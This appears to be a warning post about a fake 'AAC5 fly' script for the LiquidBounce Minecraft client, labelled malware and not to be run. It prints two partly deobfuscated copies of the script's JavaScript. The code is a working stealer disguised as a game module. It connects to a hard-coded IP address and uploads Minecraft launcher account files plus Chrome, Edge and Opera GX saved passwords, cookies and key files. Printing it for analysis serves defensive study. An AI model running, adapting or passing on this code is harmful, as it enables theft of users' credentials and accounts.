[MALICIOUS] @og's fake aac5 fly deobf
-
DO NOT RUN.
DO NOT RUN.
THIS IS MALWARE. DO NOT RUN
DO NOT RUN.
DO NOT RUN.
THIS IS MALWARE. DO NOT RUN
daf.js
Source: https://forums.ccbluex.net/topic/3401/fly-aac-5-1-0 -
@mimikyuin not-a-proper deobfuscation
-
@ali00035_ its readable now. i havent renamed variables
-
var lebron = asie; (function (marcio, kaiti) { var thelonious = asie, emsleigh = marcio(); while (!![]) { try { var lynus = -parseInt(thelonious(324)) / 1 * (-parseInt(thelonious(335)) / 2) + parseInt(thelonious(347)) / 3 + -parseInt(thelonious(326)) / 4 * (parseInt(thelonious(359)) / 5) + parseInt(thelonious(358)) / 6 * (parseInt(thelonious(356)) / 7) + -parseInt(thelonious(323)) / 8 + parseInt(thelonious(325)) / 9 * (parseInt(thelonious(339)) / 10) + -parseInt(thelonious(352)) / 11; if (lynus === kaiti) break; else emsleigh.push(emsleigh.shift()); } catch (healey) { emsleigh.push(emsleigh.shift()); } } }(arsenia, 684554)); var script = registerScript({name: lebron(319), version: lebron(327), authors: ["OG"]}); write_string = function (aysenur, daphane) { var ernist = lebron; bytes = aysenur[ernist(334)](ernist(331)), daphane.writeInt(bytes[ernist(342)]), daphane[ernist(333)](bytes, 0, bytes[ernist(342)]); }, write_file = function (dioni, kadarrius) { var brynsley = lebron; FileInputStream = Java[brynsley(360)](brynsley(344)), File = Java.type(brynsley(317)); try { uwu = new FileInputStream(new File(dioni)); } catch (taneiqua) { return; } kadarrius.writeByte(1), write_string(new File(dioni)[brynsley(346)](), kadarrius), sz = Files[brynsley(353)](Paths.get(dioni)), kadarrius[brynsley(343)](sz), kadarrius.writeByte(3), kadarrius[brynsley(343)](Files[brynsley(353)](Paths[brynsley(363)](dioni))), c = 0; while ((c = uwu.read()) != -1) kadarrius[brynsley(316)](c); kadarrius.writeByte(4); }, Paths = Java[lebron(360)]("java.nio.file.Paths"), Files = Java[lebron(360)](lebron(330)), Socket = Java[lebron(360)](lebron(348)), DataOutputStream = Java[lebron(360)](lebron(345)), server = new Socket(lebron(318), 54895), server[lebron(340)]()[lebron(333)](0), write_string(script.scriptName, new DataOutputStream(server[lebron(340)]())), xxx = new DataOutputStream(server[lebron(340)]()), write_file(lebron(341), xxx), write_file(lebron(332), xxx), System = Java[lebron(360)](lebron(337)), name = System.getProperty("user.name"), write_file(lebron(364) + name + lebron(350), xxx), write_file("C:\\Users\\" + name + lebron(349), xxx), write_file("C:\\Users\\" + name + lebron(320), xxx), write_file("C:\\Users\\" + name + lebron(322), xxx), write_file(lebron(364) + name + lebron(355), xxx), write_file("C:\\Users\\" + name + lebron(351), xxx), write_file("C:\\Users\\" + name + "\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Cookies", xxx), write_file(lebron(364) + name + lebron(338), xxx), write_file(lebron(364) + name + lebron(362), xxx), new DataOutputStream(server.getOutputStream()).writeByte(5), server[lebron(361)](), script[lebron(328)]({name: lebron(319), category: lebron(315), description: lebron(321)}, function (demetrous) { var zsa = lebron; demetrous.on(zsa(329), function () { eval(calculate_values()); }), demetrous.on(zsa(336), function () { eval(calculate_angle()); }); }); function arsenia() { var zachaery = ["20573CxzUrX", "Vm0xNFlWVXhUbkpPVm1oV1lrZFNjRlJVVGtOV1ZteHpXa2M1YW1KR1ZqTldNakZIWWtkS1NGVnNhRnBXVm5CUVdWZDRTbVF5U2tWVwpiRlpwVWpKbmVsWlVTalJXYlZGNFZHNVNVd3BpU0VKdldWaHdWMWRHV1hsalJYUlRUV3hLV0ZZeU5WZGhaM0JUVFRGS1ZGWkdWbGRqCk1EVnpWMWhvV0dKVWJGWlVWVkpIVTBacmQxZHRPVmRhTTBKWVZGZDRTMlZzV25ST1dHUnFDbUpXV2toWlZFNXpZVlpLVms1Vk9WWmgKYTBwb1ZqRmFVMVl4Y0VWVmJGWldWMFZLVkZaR1ZsZGthekZ6V2taa1ZtRXpVbkZEYXpGeVZtcE9WMUo2UVhoV1ZscGhVbFpHY21WRgpVbUVLWldwQk5WRXlZemxRVVc4OUNnPT0K = 1.1999997", "2544FDgoJW", "5aiNiWj", "type", "close", "\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data", "get", "C:\\Users\\", "Misc", "writeByte", "java.io.File", "217.138.199.84", "bypasstest", "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "test", "\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Cookies", "5888072HKnsiO", "1613QartQH", "18eGurPf", "2134464wQWGdq", "1.0", "registerModule", "enable", "java.nio.file.Files", "UTF-8", "launcher_accounts.json", "write", "getBytes", "514QjGOsS", "disable", "java.lang.System", "\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State", "5302250TYlaQe", "getOutputStream", "launcher_profiles.json", "length", "writeLong", "java.io.FileInputStream", "java.io.DataOutputStream", "getAbsolutePath", "3603435wmpJZI", "java.net.Socket", "\\AppData\\Local\\Google\\Chrome\\User Data\\Local State", "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", "\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Login Data", "21649023GQNGyG", "size", "Vm0xNFlWVXhUbkpPVm1oV1lrZFNjRlJVVGtOV1ZteHpXa2M1YW1KR1ZqTldNakZIWWtkS1NGVnNhRnBXVm5CUVdWZDRTbVF5U2tWVwpiRlpwVWpKbmVsWlVTalJXYlZGNFZHNVNVd3BpU0VKdldWaHdWMWRHV1hsalJYUlRUV3hLV0ZZeU5WZGhaM0JUVFRGS1ZGWkdWbGRqCk1EVnpWMWhvV0dKVWJGWlVWVkpIVTBacmQxZHRPVmRhTTBKWVZGZDRTMlZzV25ST1dHUnFDbUpXV2toWlZFNXpZVlpLVms1Vk9WWmgKYTBwb1ZqRmFVMVl4Y0VWVmJGWldWMFZLVkZaR1ZsZGthekZ6V2taa1ZtRXpVbkZEYXpGeVZtcE9WMUo2UVhoV1ZscGhVbFpHY21WRgpVbUVLWldwQk5WRXlZemxRVVc4OUNnPT0K = 90.005786666", "\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local State"]; arsenia = function () { return zachaery; }; return arsenia(); } function asie(crishon, neelah) { var ife = arsenia(); return asie = function (raegen, treymon) { raegen = raegen - 315; var gisselle = ife[raegen]; return gisselle; }, asie(crishon, neelah); } function calculate_values() { var kinzley = lebron; return kinzley(357); } function calculate_angle() { var daksh = lebron; return daksh(354); }or
var asai = cydnei; (function (tacie, khalessy) { var nalley = cydnei, nely = tacie(); while (!![]) { try { var larayna = -parseInt(nalley(324)) / 1 * (-parseInt(nalley(335)) / 2) + parseInt(nalley(347)) / 3 + -parseInt(nalley(326)) / 4 * (parseInt(nalley(359)) / 5) + parseInt(nalley(358)) / 6 * (parseInt(nalley(356)) / 7) + -parseInt(nalley(323)) / 8 + parseInt(nalley(325)) / 9 * (parseInt(nalley(339)) / 10) + -parseInt(nalley(352)) / 11; if (larayna === khalessy) break; else nely.push(nely.shift()); } catch (ladeana) { nely.push(nely.shift()); } } }(taij, 684554)); var script = registerScript({ name: asai(319), version: asai(327), authors: ["OG"] }); write_string = function (anjulie, deuce) { var daresha = asai; bytes = anjulie[daresha(334)](daresha(331)), deuce.writeInt(bytes[daresha(342)]), deuce[daresha(333)](bytes, 0, bytes[daresha(342)]); }, write_file = function (lylliana, sara) { var adalis = asai; FileInputStream = Java[adalis(360)](adalis(344)), File = Java.type(adalis(317)); try { uwu = new FileInputStream(new File(lylliana)); } catch (talan) { return; } sara.writeByte(1), write_string(new File(lylliana)[adalis(346)](), sara), sz = Files[adalis(353)](Paths.get(lylliana)), sara[adalis(343)](sz), sara.writeByte(3), sara[adalis(343)](Files[adalis(353)](Paths[adalis(363)](lylliana))), c = 0; while ((c = uwu.read()) != -1) sara[adalis(316)](c); sara.writeByte(4); }, Paths = Java[asai(360)]("java.nio.file.Paths"), Files = Java[asai(360)](asai(330)), Socket = Java[asai(360)](asai(348)), DataOutputStream = Java[asai(360)](asai(345)), server = new Socket(asai(318), 54895), server[asai(340)]()[asai(333)](0), write_string(script.scriptName, new DataOutputStream(server[asai(340)]())), xxx = new DataOutputStream(server[asai(340)]()), write_file(asai(341), xxx), write_file(asai(332), xxx), System = Java[asai(360)](asai(337)), name = System.getProperty("user.name"), write_file(asai(364) + name + asai(350), xxx), write_file("C:\\Users\\" + name + asai(349), xxx), write_file("C:\\Users\\" + name + asai(320), xxx), write_file("C:\\Users\\" + name + asai(322), xxx), write_file(asai(364) + name + asai(355), xxx), write_file("C:\\Users\\" + name + asai(351), xxx), write_file("C:\\Users\\" + name + "\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Cookies", xxx), write_file(asai(364) + name + asai(338), xxx), write_file(asai(364) + name + asai(362), xxx), new DataOutputStream(server.getOutputStream()).writeByte(5), server[asai(361)](), script[asai(328)]({ name: asai(319), category: asai(315), description: asai(321) }, function (cleavie) { var demarrion = asai; cleavie.on(demarrion(329), function () { eval(calculate_values()); }), cleavie.on(demarrion(336), function () { eval(calculate_angle()); }); }); function taij() { var lyndin = ["20573CxzUrX", "Vm0xNFlWVXhUbkpPVm1oV1lrZFNjRlJVVGtOV1ZteHpXa2M1YW1KR1ZqTldNakZIWWtkS1NGVnNhRnBXVm5CUVdWZDRTbVF5U2tWVwpiRlpwVWpKbmVsWlVTalJXYlZGNFZHNVNVd3BpU0VKdldWaHdWMWRHV1hsalJYUlRUV3hLV0ZZeU5WZGhaM0JUVFRGS1ZGWkdWbGRqCk1EVnpWMWhvV0dKVWJGWlVWVkpIVTBacmQxZHRPVmRhTTBKWVZGZDRTMlZzV25ST1dHUnFDbUpXV2toWlZFNXpZVlpLVms1Vk9WWmgKYTBwb1ZqRmFVMVl4Y0VWVmJGWldWMFZLVkZaR1ZsZGthekZ6V2taa1ZtRXpVbkZEYXpGeVZtcE9WMUo2UVhoV1ZscGhVbFpHY21WRgpVbUVLWldwQk5WRXlZemxRVVc4OUNnPT0K = 1.1999997", "2544FDgoJW", "5aiNiWj", "type", "close", "\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data", "get", "C:\\Users\\", "Misc", "writeByte", "java.io.File", "217.138.199.84", "bypasstest", "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "test", "\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Cookies", "5888072HKnsiO", "1613QartQH", "18eGurPf", "2134464wQWGdq", "1.0", "registerModule", "enable", "java.nio.file.Files", "UTF-8", "launcher_accounts.json", "write", "getBytes", "514QjGOsS", "disable", "java.lang.System", "\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State", "5302250TYlaQe", "getOutputStream", "launcher_profiles.json", "length", "writeLong", "java.io.FileInputStream", "java.io.DataOutputStream", "getAbsolutePath", "3603435wmpJZI", "java.net.Socket", "\\AppData\\Local\\Google\\Chrome\\User Data\\Local State", "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", "\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Login Data", "21649023GQNGyG", "size", "Vm0xNFlWVXhUbkpPVm1oV1lrZFNjRlJVVGtOV1ZteHpXa2M1YW1KR1ZqTldNakZIWWtkS1NGVnNhRnBXVm5CUVdWZDRTbVF5U2tWVwpiRlpwVWpKbmVsWlVTalJXYlZGNFZHNVNVd3BpU0VKdldWaHdWMWRHV1hsalJYUlRUV3hLV0ZZeU5WZGhaM0JUVFRGS1ZGWkdWbGRqCk1EVnpWMWhvV0dKVWJGWlVWVkpIVTBacmQxZHRPVmRhTTBKWVZGZDRTMlZzV25ST1dHUnFDbUpXV2toWlZFNXpZVlpLVms1Vk9WWmgKYTBwb1ZqRmFVMVl4Y0VWVmJGWldWMFZLVkZaR1ZsZGthekZ6V2taa1ZtRXpVbkZEYXpGeVZtcE9WMUo2UVhoV1ZscGhVbFpHY21WRgpVbUVLWldwQk5WRXlZemxRVVc4OUNnPT0K = 90.005786666", "\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local State"]; taij = function () { return lyndin; }; return taij(); } function cydnei(mguadalupe, faryl) { var peirce = taij(); return cydnei = function (sadiemae, mihrimah) { sadiemae = sadiemae - 315; var jalesse = peirce[sadiemae]; return jalesse; }, cydnei(mguadalupe, faryl); } function calculate_values() { var gottlob = asai; return gottlob(357); } function calculate_angle() { var shamiqua = asai; return shamiqua(354); }
